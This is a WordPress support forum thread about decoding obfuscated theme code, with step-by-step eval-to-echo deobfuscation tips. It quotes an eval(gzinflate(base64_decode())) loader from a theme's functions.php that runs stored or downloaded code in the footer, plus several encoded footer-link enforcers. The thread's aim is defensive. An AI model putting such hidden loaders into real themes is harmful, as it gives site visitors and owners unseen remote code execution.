WordPress.org

Ready to get started?Download WordPress

Forums

[closed] Encrypted Theme? Here's how to decode it. (195 posts)

  1. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    siranthony: Both of those can be decoded with the tool at http://ottodestruct.com/decoder.php

  2. Themes from http://www.freewordpressthemes4u.com/ are all encoded.

    Once you decode, it doesn't reveal the actual (presumably paid) links in the footer. Still hunting those down. There are also 1x1 pixel graphics for them to track usage.

    Ooo hey, bonus points for name infringement in the domain name.

  3. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    andrea_r: While I'm not entirely sure what it's displaying, I can see a fair amount of danger here. Example from the functions.php:

    function lcmp_theme_options_end(){
        $s = get_settings( 'lcmp_lic' );
        if($s === FALSE || $s==''){
            global $option;
            if(file_exists($option)){
                $s = file_get_contents($option);
                update_option('lcmp_lic',$s);
            }
        }
        eval(gzinflate(base64_decode($s)));
    }
    add_action('wp_footer','lcmp_theme_options_end');

    This is designed to download an obfuscated file and execute it in the footer. From the naming, it appears to be a license display, sort of thing. However, it could download anything at all.

    I'm not able to find how it sets the global $option variable with the location of the file to download though.

    Just another reason to not use obfuscated themes at all.

  4. Yep, agreed.

    I'm mentioning it mostly so people can stay away.

  5. peterbra
    Member
    Posted 4 years ago #

    Guys,
    what kind of encyption is this ?

    <?php $__FILE__=__FILE__;$__X__='WQzmUQumUCxkQzmUQumUWqyq _B(QTPMGU
    rl FoB srm FuurjBC mr kxBj DrttBsmn rs myxn qrnm.QTPMGU,QTPMGUjxnyuxnm-tBtEBoQTPMGU)U WQzmUQumU/CxkQzmUY';$bx=base64_decode("YmFzZTY0X2RlY29kZQ==");eval($bx('ZXZhbChzdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX19GSUxFX18uIiciLGh0bWxfZW50aXR5X2RlY29kZShzdHJ0cigkX19YX18sJ1pZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBenl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmE5ODc2NTQzMjEwJgkkIzshPz4KPCcsJzwKPj8hOyMkCSYwMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWicpLEVOVF9RVU9URVMpKSk7'));unset($__X__);unset($__FILE__); ?>

    How to decode this ?

  6. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    That was a tricky one. That decodes to this, oddly enough:

    ?><div><?php _e(&$039;ou are not allowed to view comments on this post.&$039;,&$039;wishlist-member&$039;); ?></div>>

  7. peterbra
    Member
    Posted 4 years ago #

    Otto,
    can you please share with me step-by-step how do you decode this?
    Thanks a lot !

  8. Nakari
    Member
    Posted 4 years ago #

    My code starts with <?php eval(base64_decode( and then a bunch of rubbish. There's no str... or anything like that after the eval part. I tried 2 decoders - one gives me identical rubbish and one shows bunch of little squares.
    Since I panicked I replaced footer.php with original from WorldPress but that one is showing above the bottom line, so I'd really like to decode and fix theme footer. Oh and there were a bunch of links in the footer before I replaced it.

    Thanks for help.

  9. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    @peterbra: It's not hard. Same basic process as usual. Change "eval" to "echo" then run it, replacing the eval line progressively with the output produced by the run. Repeat a few times and voila.

    @Nakari: Change the "eval" to an "echo" and then run the code. That will decode it.

  10. VitaeBlog
    Member
    Posted 4 years ago #

    I made a post on this: http://wordpress.org/support/topic/320730?replies=1#post-1245292

    You won't need decoders or anything of the sort for it to work and it has never failed me so far :)

  11. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    @VitaeBlog: That method doesn't work, because all it gives you is the output of the final code. It doesn't give you any of the PHP code, which may contain conditional changes or other things along those lines. Merely producing a static set of HTML is not all that the code might be doing.

    A decoder is better. Not using that theme at all is best.

  12. Frumph
    Member
    Posted 4 years ago #

    wp-settings.php was hacked on a wp 2.8.4 site of a client of mine

    here's the decoded:

    http://pastebin.com/f67dd6b18

    Not sure how it was injected into wp-settings.php

    I used: http://www.rbl.jp/base64.php

    to decode it

  13. @mercime
    Volunteer Moderator
    Posted 4 years ago #

    Thanks Frumph, will be checking all wp-settings.php's in servers, geez.

    Per recent post in Weblog Tools Collection there's a plugin Theme Authenticity Checker (TAC) which could help you check themes for obfuscated codes which are not only in footer.php or functions.php but have been in some cases in index.php and page.php etc.

    I see good use of this for all - esp. in WPMU installs :-)

  14. Trevel
    Member
    Posted 4 years ago #

    I could really use some help. My theme's function.php has the encrypted text and I am struggling to decode it. Help is much appreciated!!!

    <?php
    if (function_exists('register_sidebar'))
    	register_sidebar(array(
    		'before_widget' => '<div class="content">',
    		'after_widget' => '</div>',
    		'before_title' => '<h4>',
    		'after_title' => '</h4>',
    	));
    ?>
    <?php eval(str_rot13('shapgvba purpx_urnqre(){vs(!(shapgvba_rkvfgf("purpx_shapgvbaf")&&shapgvba_rkvfgf("purpx_s_sbbgre"))){rpub(\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg\');qvr;}}'));?>
    <?php eval(str_rot13('shapgvba purpx_sbbgre(){
    $y=\'Qrfvtarq ol <n uers="uggc://nqzveny-fpnssbyqvat.pb.hx">Ybaqba Fpnssbyqvat</n>.
    Pbqr ol <n uers="uggc://jjj.ovatbqnmmyr.pb.hx">Ovatb</n> |
    <n uers="uggc://jjj.ragercerarhepragre.bet">Ohfvarff oybt</n> |
    <n uers="uggc://jjj.fhttrfg-hey.bet">Ohfvarff Qverpgbel</n>.\';
    $s=qveanzr(__SVYR__).\'/sbbgre.cuc\';$sq=sbcra($s,\'e\');
    $p=sernq($sq,svyrfvmr($s));spybfr($sq);
    vs(fgecbf($p,$y)==0){rpub \'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg\';qvr;}}purpx_sbbgre();'));?>
  15. @mercime
    Volunteer Moderator
    Posted 4 years ago #

    Trevel, I used the eval(str_rot13 decoder (link in previous page) for the two strings:

    function check_header(){if(!(function_exists("check_functions")&&function_exists("check_f_footer"))){echo(\'This theme is released under creative commons licence, all links in the footer should remain intact\');die;}}
    
    function check_footer(){
    $l=\'Designed by <a href="alinkitookout">London Scaffolding</a>. Code by <a href="alinkitookout">Bingo</a> |
    <a href="alinkitookout">Business blog</a> |
    <a href="alinkitookout">Business Directory</a>.\';
    $f=dirname(__FILE__).\'/footer.php\';$fd=fopen($f,\'r\');
    $c=fread($fd,filesize($f));fclose($fd);
    if(strpos($c,$l)==0){echo \'This theme is released under creative commons licence, all links in the footer should remain intact\';die;}}check_footer();

    Double check your header.php and footer.php for encryptions as well.

  16. RichH
    Member
    Posted 4 years ago #

    peterbra asked what kind of encryption this is:

    <?php $__FILE__=__FILE__;$__X__='WQzmUQumUC...

    What tool does that? I need to do something to keep prying eyes out of a corporate configuration file.

  17. Xsecror
    Member
    Posted 4 years ago #

    Thank you for this links. Really helpful. I always wondered how to get rid of those encrypted footers.

  18. vacom
    Member
    Posted 4 years ago #

    naweedshams, thanks your tips! It's work for me! Thanks again :)

  19. digtialv
    Member
    Posted 4 years ago #

    Hi Otto and all.

    I have been busting my head with this one for some days now and i have to admit I'm not that savvy with these decoders.

    The code that im having trouble with: http://snipt.org/pVj

    I'm guessing that its base64 encoded but i cant seem to decode it.

    I really appreciate all the help i can get.

    Thanks!

  20. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    digtialv: Boy, decoding that one is really annoying.

    Anyway, here:

    ?><?php global $options; foreach ($options as $value) { if (get_settings( $value['id'] ) === FALSE) { $$value['id'] = $value['std']; } else { $$value['id'] = get_settings( $value['id'] ); } } ?>
    
    <?php if ( $wp_chatter_features_on == 'yes' && $wp_chatter_home_posts_by_cat == 'yes' && $wp_chatter_feature_display == 'Display Separately' ) { ?>
    <?php include (TEMPLATEPATH . '/index2.php'); ?>
    <?php } elseif ( $wp_chatter_features_on == 'yes' && $wp_chatter_home_posts_by_cat == 'yes' && $wp_chatter_feature_display == 'Display in Glider' ) { ?>
    <?php include (TEMPLATEPATH . '/index3.php'); ?>
    <?php } elseif ( $wp_chatter_features_on == 'no' && $wp_chatter_home_posts_by_cat == 'yes' ) { ?>
    <?php include (TEMPLATEPATH . '/index3.php'); ?>
    <?php } else { ?>
    <?php include (TEMPLATEPATH . '/index1.php'); ?>
    <?php } ?>
  21. digtialv
    Member
    Posted 4 years ago #

    :-D How the h*** did you do it?
    Any tips you can give us for future problems on this type of encoding?

    Thank you so much Otto!!!

  22. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    Okay, basic process I used is this (large amounts of gibberish code omitted for brevity):

    1. Copy the code, put it into a php file.
    2. Use my text editor of choice (TextPad, because it groks regular expressions) to add newlines after every semi-colon. This makes it easier to see what the code is doing. That gives me this code:

    <?php $_F=__FILE__;
    $_X='PzNhP21a...Q/Mw==';
    $_D=strrev('edoced_46esab');
    eval($_D('JF9YPW...OyRfWD0wOw=='));
    ?>

    3. Change the eval to an echo and run the code. Resulting output was this:

    $_X=base64_decode($_X);$_X=strtr($_X,'O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K
    QH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF','iC
    vfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN');$_R=str
    _replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

    This code basically does two things. First, it decodes the big $_X variable with base64_decode. Then, it uses strtr to replace the characters from the big main decoded string with another set of characters. It's a simple substitution code, basically. The letter "O" is replaced with the letter "i", and so forth. However, this set of strings contains two things of importance: line breaks. The breaks happen at weird places. So, I need to modify the code slightly to put those back in as \n characters. This also means I needed to change those strings from being in single quotes to being in double quotes. The result then replaces the "echo" line in the original code, but only that line.

    This is the resulting code (after once more adding line breaks after semi-colons, for readability):

    <?php $_F=__FILE__;
    $_X='PzNhP...0VDQ/Mw==';
    $_D=strrev('edoced_46esab');
    $_X=base64_decode($_X);
    $_X=strtr($_X,"O/bpuw3kM6B2txD1.RoX]lVY >JAEGTfz7K\nQH=js}ZqUce8v5nm<[9a4i0CrW{NghdILPySF","iC\nvfF>zeSE7P5nqlAt.wWDOmKubdU}=3M{Rkcx92JhLZgX06yrpQTG< VajIB1][Y48sH/oN");
    $_R=str_replace('__FILE__',"'".$_F."'",$_X);
    eval($_R);
    $_R=0;
    $_X=0;

    Change that eval to an echo again, and run it.

    Voila, there's your decoded code.

  23. mikerudd27
    Member
    Posted 4 years ago #

    Hey Otto got another one for you.. have a look at the footer on the site: http://www.launified.info

    Thanks so much!

    code removed by mod

  24. mikerudd27
    Member
    Posted 4 years ago #

    I have another too..

    code removed by mod

  25. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    mikerudd27, please don't post that sort of large code on these forums. Small pieces is fine, but large chunks should be posted on a pastebin type site and the link posted here. We tend to use http://wordpress.pastebin.com for that sort of thing.

    The very first post in this thread has a link to a decoder explicitly designed for your first bit of code: http://www.tareeinternet.com/scripts/decrypt.php

    The second piece you posted wasn't code at all, it was an image that was embedded using the data: URL scheme.

  26. mikerudd27
    Member
    Posted 4 years ago #

    sorry. thanks for your support!

  27. avstu
    Member
    Posted 4 years ago #

    Ive tried all the decoders above but cant seem to find one that works.. Any suggestions?

    eval(base64_decode('Pz4gPGRpdiBpZD0iZm9vdGVyIj4NCjxwPjw/cGhwIHRoZV90aW1lKCdZJyk7ID8+IDw/cGhwIGJsb2dpbmZvKCduYW1lJyk7ID8+LiAgV29yZFByZXNzLjxhIGhyZWY9Imh0dHA6Ly93d3cuZW1haWxtYXJrZXRpbmdkaWdlc3QuY29tLyIgdGl0bGU9IkVtYWlsIG1hcmtldGluZyI+RW1haWwgbWFya2V0aW5nPC9hPjwvcD4NCjwvZGl2Pg0KDQoNCjw/cGhwIHdwX2Zvb3RlcigpOyA/Pg0KDQo8L2JvZHk+DQo8L2h0bWw+IDw/'))`

  28. amfpg
    Member
    Posted 4 years ago #

    hi otto, i try your suggestion to change the eval with echo and run this file from php command line

    <?php eval(base64_decode('Pz4gPGRpdiBpZD0iZm9vdGVyLWhvbGRlciI+DQogIDxkaXYgY2xhc3M9ImZvb3RlciI+PC9kaXY+DQogIDxkaXYgY2xhc3M9InR4dCI+DQogICAgPD9waHAgcXVlcnlfcG9zdHMoJ3BhZ2VuYW1lPWFib3V0Jyk7ID8+DQogICAgPD9waHAgaWYgKGhhdmVfcG9zdHMoKSkgOiA/Pg0KICAgIDw/cGhwIHdoaWxlIChoYXZlX3Bvc3RzKCkpIDogdGhlX3Bvc3QoKTsgPz4NCiAgICA8P3BocCB0aGVfY29udGVudCgpOyA/Pg0KICAgIDw/cGhwIGVuZHdoaWxlOyA/Pg0KICAgIDw/cGhwIGVuZGlmOyA/Pg0KICA8L2Rpdj4NCiAgIDxhIGhyZWY9Imh0dHA6Ly9lbWFpbC1yZXNwb25kZXIubmV0LyIgdGl0bGU9IkVtYWlsIGF1dG9yZXNwb25kZXIiPkVtYWlsIGF1dG9yZXNwb25kZXI8L2E+IDwvZGl2Pg0KPD9waHAgd3BfZm9vdGVyKCk7ID8+DQo8L2JvZHk+PC9odG1sPiA8Pw=='));?>

    and i got this

    <div id="footer-holder">
      <div class="footer"></div>
      <div class="txt">
        <?php query_posts('pagename=about'); ?>
        <?php if (have_posts()) : ?>
        <?php while (have_posts()) : the_post(); ?>
        <?php the_content(); ?>
        <?php endwhile; ?>
        <?php endif; ?>
      </div>
       <a href="http://email-responder.net/" title="Email autoresponder">Email autoresponder</a> </div>
    <?php wp_footer(); ?>
    </body></html>

    this correct result right?

    thx

  29. amfpg
    Member
    Posted 4 years ago #

    another question, how do i know if another file have an encode text?
    i download theme and found in footer.php have line eval word

    for another file how to check?

  30. danalingga
    Member
    Posted 4 years ago #

    Great tools, now i can decode all the encrypted code theme so know what exactly the code is. Thanks.

Topic Closed

This topic has been closed to new replies.

About this Topic